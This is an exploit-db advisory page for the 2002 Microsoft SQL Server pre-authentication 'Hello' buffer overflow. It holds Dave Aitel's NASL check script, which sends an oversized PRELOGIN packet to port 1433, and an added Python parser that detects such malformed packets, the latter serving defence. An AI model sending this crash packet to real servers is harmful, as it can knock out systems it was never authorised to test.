Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow

Published: 06 Aug 2002 00:00:00
Reported by: Dave Aitel
Type: exploitdb
Source: www.exploit-db.com

Vulnerability in Microsoft SQL Server allows remote attackers to execute code via buffer overflow.

Related

Family       | Title                                                                    | Published
ATTACKERKB   | CVE-2000-0402                                                            | 30 May 2000 04:00
Circl        | CVE-2000-0402                                                            | 21 Dec 2010 00:00
CVE          | CVE-2000-0402                                                            | 12 Jul 2000 04:00
Cvelist      | CVE-2000-0402                                                            | 12 Jul 2000 04:00
exploitpack  | Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow   | 6 Aug 2002 00:00
Metasploit   | Microsoft SQL Server Payload Execution                                   | 21 Feb 2012 01:40
Metasploit   | Microsoft SQL Server Payload Execution via SQL Injection                 | 27 Jan 2011 16:48
NVD          | CVE-2000-0402                                                            | 30 May 2000 04:00
Packet Storm | Microsoft SQL Server Payload Execution                                   | 26 Nov 2009 00:00
Packet Storm | Microsoft SQL Server Payload Execution via SQL injection                 | 29 Jan 2011 00:00

source: https://www.securityfocus.com/bid/5411/info

A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts.

It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.

This vulnerability reportedly occurs even before authentication can proceed.

##
#
# This script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
# TODO:
# Technically we should also go to the UDP 1434 resolver service
# and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);

 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);

 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433);
 exit(0);
}

#
# The script code starts here
#
# Taken from mssql.spk: the 8-byte TDS header (type 0x12 = PRELOGIN, declared
# length 0x0034 = 52 bytes), followed by the option table (VERSION, ENCRYPTION,
# INSTOPT, THREADID, 0xff terminator) and the VERSION and ENCRYPTION values.
# The INSTOPT (instance name) field, declared as 12 bytes, starts right after.
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

# Taken from mssql.spk: the NUL that terminates the instance name, then the
# 4-byte THREADID value.
pkt_tail = raw_string(
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

# Technically we should also go to the UDP 1434 resolver service
# and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # Uncomment this to see what normally happens
        # attack_string = "MSSQLServer";
        # Uncomment the next line to actually test for the overflow:
        # 560 filler bytes in the 12-byte instance-name field
        attack_string = crap(560);
        # This creates a variable called sql_packet
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        r = recv(socket:soc, length:4096);
        close(soc);
        display("Result:", r, "\n");
        # No reply at all means the service stopped answering, which is
        # taken as the overflow having crashed it
        if(!r)
        {
            display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}
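The description above says the overflow is triggered by a malformed login request before authentication, and the script shows exactly what "malformed" means here: the pre-login packet declares a 52-byte length and a 12-byte instance-name field, but carries 560 filler bytes in that field. The following is an added example, written for this page and not part of Dave Aitel's script or exploit-db, of the consistency check a sensor or log parser on the defender's side could run over such a packet. It relies only on the TDS header layout (type, status, big-endian length, SPID, packet id, window) and the PRELOGIN option tokens (type, offset, length), embeds the script's pkt_hdr and pkt_tail bytes as the fixed parts of constructed sample packets, and the function names and the MAX_INSTANCE_NAME threshold are assumptions of the example, not values from the advisory.

```python
import struct

# TDS packet type of the pre-login handshake the script above targets.
TDS_PRELOGIN = 0x12

# PRELOGIN option tokens: each is 5 bytes (type, 16-bit offset, 16-bit length).
PL_VERSION, PL_ENCRYPTION, PL_INSTOPT, PL_THREADID, PL_TERMINATOR = 0x00, 0x01, 0x02, 0x03, 0xFF

# Policy ceiling for an instance name; an assumption of this example, not a protocol limit.
MAX_INSTANCE_NAME = 64

# Fixed header and tail bytes exactly as the script above sends them.
PKT_HDR = bytes([
    0x12, 0x01, 0x00, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x06, 0x01, 0x00, 0x1b,
    0x00, 0x01, 0x02, 0x00, 0x1c, 0x00, 0x0c, 0x03, 0x00, 0x28, 0x00, 0x04, 0xff, 0x08, 0x00, 0x02,
    0x10, 0x00, 0x00, 0x00,
])
PKT_TAIL = bytes([0x00, 0x24, 0x01, 0x00, 0x00])


def sample_packet(instance_field: bytes) -> bytes:
    """Constructed sample: header + instance-name bytes + tail, the script's sql_packet layout."""
    return PKT_HDR + instance_field + PKT_TAIL


def parse_tds_header(pkt: bytes) -> dict:
    """Decode the 8-byte TDS header: type, status, big-endian length, SPID, packet id, window."""
    if len(pkt) < 8:
        raise ValueError("packet shorter than the 8-byte TDS header")
    ptype, status, length, spid, pkt_id, window = struct.unpack(">BBHHBB", pkt[:8])
    return {"type": ptype, "status": status, "length": length,
            "spid": spid, "packet_id": pkt_id, "window": window}


def check_prelogin(pkt: bytes) -> list:
    """Return findings for a PRELOGIN packet; an empty list means it is self-consistent."""
    findings = []
    hdr = parse_tds_header(pkt)
    if hdr["type"] != TDS_PRELOGIN:
        return [f"not a PRELOGIN packet (type 0x{hdr['type']:02x})"]
    if hdr["length"] != len(pkt):
        findings.append(f"declared length {hdr['length']} != actual length {len(pkt)}")

    # Walk the option table: 5-byte tokens until the 0xff terminator.
    options = {}
    pos = 8
    while pos < len(pkt) and pkt[pos] != PL_TERMINATOR:
        if pos + 5 > len(pkt):
            findings.append("option table truncated")
            return findings
        offset, length = struct.unpack(">HH", pkt[pos + 1:pos + 5])
        options[pkt[pos]] = (offset, length)
        pos += 5
    if pos >= len(pkt):
        findings.append("option table has no terminator")

    # Option data offsets are relative to the end of the header and must stay inside the packet.
    for tok, (offset, length) in options.items():
        if 8 + offset + length > len(pkt):
            findings.append(f"option 0x{tok:02x} data runs past end of packet")

    if PL_INSTOPT in options:
        offset, length = options[PL_INSTOPT]
        start = 8 + offset
        declared = pkt[start:start + length]
        # The instance name is a NUL-terminated string. Measure how far a reader that stops
        # at the terminator, rather than at the declared length, would actually consume.
        nul = pkt.find(b"\x00", start)
        run = (nul - start) if nul != -1 else (len(pkt) - start)
        if b"\x00" not in declared:
            findings.append(f"instance name not NUL-terminated within declared {length} bytes")
        if run > length:
            findings.append(f"instance name runs {run} bytes, declared {length}")
        if run > MAX_INSTANCE_NAME:
            findings.append(f"instance name length {run} exceeds policy maximum {MAX_INSTANCE_NAME}")
    return findings


if __name__ == "__main__":
    # Constructed inputs: the normal handshake the script comments out, and the filler it sends.
    for label, field in (("normal", b"MSSQLServer"), ("oversized", b"A" * 560)):
        print(label, check_prelogin(sample_packet(field)) or "ok")
```

The normal packet passes every check; the oversized one fails four: the declared length no longer matches the wire length, the 12 declared instance-name bytes contain no terminator, the terminator-bounded string is 560 bytes against a declared 12, and that exceeds the policy ceiling. The second and third findings are the ones worth alerting on, since a consumer that trusts the terminator over the declared length is exactly the kind of reader a filler string like this overruns.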

Scores: Vulners AI Score 6.5 (Medium risk); CVSS 2: 2.1; EPSS: 0.78483